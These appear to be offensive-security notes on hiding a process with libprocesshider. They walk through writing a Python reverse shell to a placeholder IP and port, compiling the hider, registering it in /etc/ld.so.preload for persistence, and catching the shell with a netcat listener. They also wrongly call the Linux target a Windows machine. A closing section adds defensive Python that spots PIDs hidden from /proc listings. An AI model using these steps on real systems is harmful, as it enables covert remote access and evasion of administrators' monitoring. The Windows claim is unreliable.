## General

GOAL ---> Hide process from `ps aux`

Libprocesshider is a library that allows software developers to hide the details of a process from the operating system. It provides an API for hiding the process name and arguments, as well as for hiding the presence of the process from process management utilities. The library is useful for hiding the details of malware or other types of malicious software, as well as for protecting proprietary software from reverse engineering.

Important - Can only hide one process at a time

## Commands

The repository needs to be cloned on the target (windows machine)

Download the repository (Target)

```
git clone https://github.com/gianlucaborello/libprocesshider.git
```

Create reverse shell and compile the code (Target)

```
# Create a reverse shell (reverse_shell.py)
nano reverse_shell.py

#!/usr/bin/python3
from os import dup2
from subprocess import run
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("IP",PORT))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
run(["/bin/bash","-i"])

# Give chmod permission
chmod +x reverse_shell.py

# Edit processhider.c
nano processhider.c
# - Change the script name of the python code for your evil code
# - Save

# Compile the code in the directory
USER@sid:~/libprocesshider$ make
# ---> This will create libprocesshider.so

# Copy the file in the right folder
cp libprocesshider.so /usr/local/lib/

# Load it with the global dynamic linker
echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
```

Launch the reverse_shell

```
./reverse_shell.py
```

Netcat Listener (Attacking)

```
nc -lvnp PORT
```

The process should now be hidden

## More Information

More information ---> https://github.com/gianlucaborello/libprocesshider
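
## Detection

Detecting this kind of hiding, as an added example that is not part of the original notes or of libprocesshider: the preloaded library filters what `readdir()` returns for `/proc`, so a PID that opens by path but never appears in a directory listing is being hidden. The function names are illustrative assumptions, and the scan walks every PID up to `pid_max`, which can take a while on hosts with a large PID range.

```python
import os
import re


def parse_preload(text):
    """Library paths named in ld.so.preload content ('#' starts a comment)."""
    libs = []
    for line in text.splitlines():
        libs += [p for p in re.split(r"[:\s]+", line.split("#", 1)[0]) if p]
    return libs


def listed_pids(proc="/proc"):
    """PIDs as returned by readdir(), the call a preloaded hider filters."""
    return {int(n) for n in os.listdir(proc) if n.isdigit()}


def is_group_leader(pid, proc="/proc"):
    """True if /proc/<pid> is a process, not a thread (threads resolve by
    path but are never listed, so they would be false positives)."""
    try:
        with open(os.path.join(proc, str(pid), "status")) as fh:
            fields = dict(l.split(":", 1) for l in fh if ":" in l)
        return fields["Tgid"].strip() == fields["Pid"].strip() == str(pid)
    except (OSError, KeyError):
        return False  # exited while probing, or unreadable


def probed_pids(max_pid, proc="/proc"):
    """PIDs found by opening /proc/<pid> directly, which bypasses readdir()."""
    return {p for p in range(1, max_pid + 1) if is_group_leader(p, proc)}


def hidden_pids(listed, probed, relisted):
    """PIDs that resolve by path but are absent from listings taken before
    and after the probe (the second listing drops newly started processes)."""
    return sorted(probed - listed - relisted)


if __name__ == "__main__":
    try:
        with open("/etc/ld.so.preload") as fh:
            print("ld.so.preload entries:", parse_preload(fh.read()))
    except FileNotFoundError:
        print("ld.so.preload: not present")
    with open("/proc/sys/kernel/pid_max") as fh:
        max_pid = int(fh.read())
    before = listed_pids()
    probed = probed_pids(max_pid)
    print("hidden PIDs:", hidden_pids(before, probed, listed_pids()))
```

Any entry in `/etc/ld.so.preload` that the host's configuration management did not put there deserves investigation on its own, whether or not a hidden PID turns up.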